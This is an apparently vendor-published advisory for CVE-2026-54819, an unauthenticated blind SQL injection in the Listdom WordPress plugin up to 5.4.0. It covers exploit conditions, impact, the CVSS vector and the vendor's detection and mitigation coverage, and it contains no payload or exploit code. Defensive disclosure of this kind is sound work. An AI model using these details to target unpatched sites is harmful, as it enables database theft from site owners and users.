How is CVE-2026-54819 exploited?

Network reachability (required): The vulnerable plugin endpoint is exposed over the network, meaning an attacker must be able to reach the WordPress installation via HTTP or HTTPS to deliver the malicious payload. Authentication (not-required): No account or session credential is needed; the injection point is accessible to unauthenticated requests. Victim interaction (not-required): The attack is fully server-side and requires no action from any user or administrator of the affected site. Attack complexity (info): Exploitation is reliable and condition-free; no race conditions, special memory layout, or environmental prerequisites are required beyond network access to the target.

What is the impact of CVE-2026-54819?

An attacker reads arbitrary rows from the WordPress database, including user credentials (hashed passwords), email addresses, session tokens, and any plugin-stored customer or listing records. Because the scope is Changed (S:C in the CVSS vector), data exposure can extend beyond the WordPress application boundary to other databases or services sharing the same database server. Availability is partially impaired; resource-intensive blind injection queries can degrade database performance and cause intermittent service disruption for legitimate site visitors.

Back to search

CRITICALCVE-2026-54819Published 2026-06-17Modified 2026-06-17CNA Patchstack

CVE-2026-54819: WordPress Listdom plugin <= 5.4.0 - SQL Injection vulnerability

Q: What is CVE-2026-54819?

SQL injection vulnerability in the Listdom WordPress plugin (versions up to and including 5.4.0) is reachable over the network with no authentication required. An attacker can send crafted HTTP requests to inject arbitrary SQL commands into the underlying database using a blind injection technique, which does not return query results directly but instead infers data through timing or conditional responses. Successful exploitation reads confidential data from the database and can partially disrupt service availability. HarborGuard is tracking this advisory and will make a patched-image rebuild available as soon as an upstream fix is published.

Q: Is CVE-2026-54819 patched?

Because no upstream fix version has been published for this CVE, HarborGuard re-checks the advisory each ingest cycle and will make a patched-image rebuild available the moment a remediated release is shipped by Webilia Inc. In the interim, compensating controls such as network-policy isolation of affected workloads are surfaced as recommended actions within the HarborGuard findings interface.

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Webilia Inc. Listdom allows Blind SQL Injection. This issue affects Listdom: from n/a through 5.4.0.

CVSS v3.1: 9.3
Severity: CRITICAL
Fixed in: —
Affected Products: 1

HarborGuard Analysis

Synopsis

SQL injection vulnerability in the Listdom WordPress plugin (versions up to and including 5.4.0) is reachable over the network with no authentication required. An attacker can send crafted HTTP requests to inject arbitrary SQL commands into the underlying database using a blind injection technique, which does not return query results directly but instead infers data through timing or conditional responses. Successful exploitation reads confidential data from the database and can partially disrupt service availability. HarborGuard is tracking this advisory and will make a patched-image rebuild available as soon as an upstream fix is published.

HarborGuard Coverage

Detection

Detection for CVE-2026-54819 is available across every HarborGuard environment, with the CVE matched against customer images within minutes of ingestion from upstream feeds including Patchstack, including custom-built images that bundle the Listdom plugin. Scanning covers both registry images and images evaluated inline during CI/CD pipeline runs.

Available

Triage

HarborGuard is capable of scoring this CVE at its published CVSS v3.1 rating of 9.3 (Critical) and weighting that score against each customer environment's compliance policy to determine escalation priority. Triage routing directs findings to the appropriate team inbox within each customer organization based on configured ownership rules.

Available

Patch

Because no upstream fix version has been published for this CVE, HarborGuard re-checks the advisory each ingest cycle and will make a patched-image rebuild available the moment a remediated release is shipped by Webilia Inc. In the interim, compensating controls such as network-policy isolation of affected workloads are surfaced as recommended actions within the HarborGuard findings interface.

Pending upstream

Exploit Conditions

Network reachabilityRequired
The vulnerable plugin endpoint is exposed over the network, meaning an attacker must be able to reach the WordPress installation via HTTP or HTTPS to deliver the malicious payload.
AuthenticationNot required
No account or session credential is needed; the injection point is accessible to unauthenticated requests.
Victim interactionNot required
The attack is fully server-side and requires no action from any user or administrator of the affected site.
Attack complexityDetail
Exploitation is reliable and condition-free; no race conditions, special memory layout, or environmental prerequisites are required beyond network access to the target.

Blast Radius

An attacker reads arbitrary rows from the WordPress database, including user credentials (hashed passwords), email addresses, session tokens, and any plugin-stored customer or listing records.
Because the scope is Changed (S:C in the CVSS vector), data exposure can extend beyond the WordPress application boundary to other databases or services sharing the same database server.
Availability is partially impaired; resource-intensive blind injection queries can degrade database performance and cause intermittent service disruption for legitimate site visitors.

How HarborGuard Handles This

Available on HarborGuard: detection for this critical SQL injection is active and matched against all customer images that include the Listdom plugin, with results surfaced in the findings dashboard immediately after ingestion. Because no upstream patch exists as of publication (2026-06-17), HarborGuard monitors the Patchstack advisory on every ingest cycle and will automatically make a patched-image rebuild available and, for customers with auto-remediation enabled, trigger a rebuild plus regression run plus a PR opened against affected workloads the moment a fix version is released. In the interim, HarborGuard surfaces compensating-control recommendations including network-policy isolation to restrict public HTTP access to the affected WordPress endpoints and egress filtering at the database tier to limit the blast radius of a successful injection. Where compliance policy permits, these recommendations can be applied as automated network-policy patches without waiting for an application-level fix.

See how HarborGuard automates this

Affected packages

Webilia Inc. / Listdom
≤ 5.4.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

References

patchstack.com

Metrics

Get notified